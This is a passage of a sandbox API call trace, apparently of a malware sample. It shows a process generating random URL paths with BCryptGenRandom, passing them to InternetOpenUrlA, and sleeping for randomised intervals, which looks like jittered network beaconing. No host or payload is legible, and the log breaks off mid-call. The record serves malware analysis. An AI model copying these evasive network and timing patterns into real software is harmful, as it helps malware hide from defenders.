pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0275.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.077] GetProcessHeap () returned 0x440000 [0276.077] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0276.077] lstrcpyA (in: lpString1=0x472f30, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0276.078] lstrcatA (in: lpString1="\x81\x03", lpString2="/qlqX56z2jsz6isJc1pdkGg1mGwyOmtua9m7sek70z2/jbp4Z3qjvh76uwq1Uy9tkwodModteusne1nwe8wpuxhF/mpWk7me7tgjcwhli6/oh3HjJCQ12awr1mzpHaObrg0v7l3vfQl/bqy15j7nr44cyaq3h0ssldq7f85ml1c79eZZMdX15/" | out: lpString1="\x81\x03/qlqX56z2jsz6isJc1pdkGg1mGwyOmtua9m7sek70z2/jbp4Z3qjvh76uwq1Uy9tkwodModteusne1nwe8wpuxhF/mpWk7me7tgjcwhli6/oh3HjJCQ12awr1mzpHaObrg0v7l3vfQl/bqy15j7nr44cyaq3h0ssldq7f85ml1c79eZZMdX15/") returned="\x81\x03/qlqX56z2jsz6isJc1pdkGg1mGwyOmtua9m7sek70z2/jbp4Z3qjvh76uwq1Uy9tkwodModteusne1nwe8wpuxhF/mpWk7me7tgjcwhli6/oh3HjJCQ12awr1mzpHaObrg0v7l3vfQl/bqy15j7nr44cyaq3h0ssldq7f85ml1c79eZZMdX15/" [0276.078] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0276.078] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/qlqX56z2jsz6isJc1pdkGg1mGwyOmtua9m7sek70z2/jbp4Z3qjvh76uwq1Uy9tkwodModteusne1nwe8wpuxhF/mpWk7me7tgjcwhli6/oh3HjJCQ12awr1mzpHaObrg0v7l3vfQl/bqy15j7nr44cyaq3h0ssldq7f85ml1c79eZZMdX15/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0276.078] GetProcessHeap () returned 0x440000 [0276.078] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0276.078] GetProcessHeap () returned 0x440000 [0276.078] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a01850 | out: hHeap=0x440000) returned 1 [0276.079] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0276.079] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0276.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0276.080] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0276.080] Sleep (dwMilliseconds=0x1a078) [0276.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0276.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0276.241] GetProcessHeap () returned 0x440000 [0276.241] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b2c0 [0276.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.241] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0276.241] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b2c1, cbBuffer=0x11, dwFlags=0x2 | out: pbBuffer=0x3a1b2c1) returned 0x0 [0276.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.242] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.243] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.244] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0276.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b2d2, cbBuffer=0x2a, dwFlags=0x2 | out: pbBuffer=0x3a1b2d2) returned 0x0 [0276.245] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.246] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.247] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.248] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.248] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.248] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.248] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.249] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.249] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.249] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.249] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.250] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.250] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.250] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.250] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.250] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.251] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.251] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.251] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.251] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.251] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.252] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.252] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.252] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.252] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.252] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.252] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.252] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.252] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.252] GetProcessHeap () returned 0x440000 [0276.252] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473980 [0276.253] lstrcpyA (in: lpString1=0x473980, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0276.253] lstrcatA (in: lpString1="\x81\x03", lpString2="/sWe1jbp3bzla5kob/t4icyv5X768x6fm1pedvbsysq9zyjker8om8yva4C/" | out: lpString1="\x81\x03/sWe1jbp3bzla5kob/t4icyv5X768x6fm1pedvbsysq9zyjker8om8yva4C/") returned="\x81\x03/sWe1jbp3bzla5kob/t4icyv5X768x6fm1pedvbsysq9zyjker8om8yva4C/" [0276.253] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0276.253] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/sWe1jbp3bzla5kob/t4icyv5X768x6fm1pedvbsysq9zyjker8om8yva4C/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0276.253] GetProcessHeap () returned 0x440000 [0276.253] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473980 | out: hHeap=0x440000) returned 1 [0276.253] GetProcessHeap () returned 0x440000 [0276.253] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b2c0 | out: hHeap=0x440000) returned 1 [0276.253] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0276.253] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0276.254] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.254] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0276.254] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0276.254] Sleep (dwMilliseconds=0x1b0e8) [0276.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0276.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.444] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0276.444] GetProcessHeap () returned 0x440000 [0276.444] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d4900 [0276.444] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0276.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4901, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x4d4901) returned 0x0 [0276.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.445] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.446] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.447] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.695] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.695] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.695] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.696] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.696] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.696] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.696] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.696] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.696] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.696] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.696] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.696] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.696] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0276.697] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.697] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.697] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0276.697] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4919, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x4d4919) returned 0x0 [0276.698] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.698] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0276.698] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0276.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0276.698] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 